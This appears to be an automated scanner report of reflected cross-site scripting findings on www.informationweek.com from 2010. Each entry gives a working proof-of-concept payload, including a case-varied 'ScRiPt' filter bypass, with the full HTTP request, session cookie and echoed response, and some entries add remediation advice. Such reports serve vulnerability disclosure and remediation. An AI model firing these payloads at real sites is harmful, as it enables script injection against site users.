The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6340d</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>8f54963dd57 was submitted in the REST URL parameter 1. This input was echoed as 6340d</ScRiPt ><img src=a onerror=alert(1)>8f54963dd57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain expressions that are often used in XSS attacks, but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /6340d</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>8f54963dd57/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:19:56 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:19:56 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30172
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/6340d</ScRiPt ><img src=a onerror=alert(1)>8f54963dd57/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=346810551;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a404'-alert(1)-'e51ec36f67a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news2a404'-alert(1)-'e51ec36f67a/galleries/smb/ebusiness/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:44 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:44 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30771
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_SMB_Ebusiness_Welcome_Ad_1x1;key=/news2a404'-alert(1)-'e51ec36f67a/galleries/smb/ebusiness/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=347770898;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56df9"><script>alert(1)</script>f819bc441ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news56df9"><script>alert(1)</script>f819bc441ff/galleries/smb/ebusiness/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:42 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:42 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30809
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_SMB_Ebusiness_Welcome_Ad_1x1;key=/news56df9"><script>alert(1)</script>f819bc441ff/galleries/;kvarticleid=;kvauthor=;loc=300;grp=51624629" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d6f3"><script>alert(1)</script>b43644bf6f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/galleries6d6f3"><script>alert(1)</script>b43644bf6f2/smb/ebusiness/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:47 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:47 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30826
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_SMB_Ebusiness_Welcome_Ad_1x1;key=/news/galleries6d6f3"><script>alert(1)</script>b43644bf6f2/;kvarticleid=;kvauthor=;loc=300;grp=590162705" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55a44'-alert(1)-'3675c7ce266 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/galleries55a44'-alert(1)-'3675c7ce266/smb/ebusiness/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:49 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:49 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30776
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_SMB_Ebusiness_Welcome_Ad_1x1;key=/news/galleries55a44'-alert(1)-'3675c7ce266/smb/ebusiness/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=116074273;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc64c"><a%20b%3dc>ea41986d2b6 was submitted in the REST URL parameter 3. This input was echoed as bc64c"><a b=c>ea41986d2b6 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/galleries/smbbc64c"><a%20b%3dc>ea41986d2b6/ebusiness/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:55 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:55 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30255
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/galleries/smbbc64c"><a b=c>ea41986d2b6/ebusiness/show;kvarticleid=;kvauthor=;loc=300;grp=389870957" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d640b'-alert(1)-'f778d3bcf48 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/galleries/smbd640b'-alert(1)-'f778d3bcf48/ebusiness/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:24:01 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:24:01 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30241
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/galleries/smbd640b'-alert(1)-'f778d3bcf48/ebusiness/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=676901299;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 276ed'-alert(1)-'15a6d2c5c10 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/galleries/smb/ebusiness276ed'-alert(1)-'15a6d2c5c10/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:24:10 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:24:10 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30748
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... 'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_SMB_Ebusiness_Welcome_Ad_1x1;key=/news/galleries/smb/ebusiness276ed'-alert(1)-'15a6d2c5c10/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=946810314;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c39e2"><a%20b%3dc>7594f40ed3d was submitted in the REST URL parameter 4. This input was echoed as c39e2"><a b=c>7594f40ed3d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/galleries/smb/ebusinessc39e2"><a%20b%3dc>7594f40ed3d/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:24:06 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:24:06 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30762
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_SMB_Ebusiness_Welcome_Ad_1x1;key=/news/galleries/smb/ebusinessc39e2"><a b=c>7594f40ed3d/show;kvarticleid=;kvauthor=;loc=300;grp=129603650" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 342cb"><script>alert(1)</script>30da13bdb15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news342cb"><script>alert(1)</script>30da13bdb15/global-cio/interviews/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:42 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:42 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 31129
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_GlobalCIO_Executive_Insights_Interviews_Welcome_Ad_1x1;key=/news342cb"><script>alert(1)</script>30da13bdb15/global-cio;kvarticleid=;kvauthor=;loc=300;grp=468734410" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc330'-alert(1)-'2028717cfd9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsbc330'-alert(1)-'2028717cfd9/global-cio/interviews/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:44 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:44 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 31079
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... pt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_GlobalCIO_Executive_Insights_Interviews_Welcome_Ad_1x1;key=/newsbc330'-alert(1)-'2028717cfd9/global-cio/interviews/sho;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=368932088;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 560fe'-alert(1)-'7135bbf7bce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/global-cio560fe'-alert(1)-'7135bbf7bce/interviews/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:49 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:49 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30254
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/global-cio560fe'-alert(1)-'7135bbf7bce/interviews/sho;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=41133687;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49d78"><script>alert(1)</script>0f417733d6b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/global-cio49d78"><script>alert(1)</script>0f417733d6b/interviews/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:47 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:47 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30316
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/global-cio49d78"><script>alert(1)</script>0f417733d6b;kvarticleid=;kvauthor=;loc=300;grp=588046586" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74cfb'-alert(1)-'97a4ef750c2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/global-cio/interviews74cfb'-alert(1)-'97a4ef750c2/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:59 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:59 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 31045
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... t1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_GlobalCIO_Executive_Insights_Interviews_Welcome_Ad_1x1;key=/news/global-cio/interviews74cfb'-alert(1)-'97a4ef750c2/sho;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=43412235;misc='+new Date().getTime()+'"> ...[SNIP]...
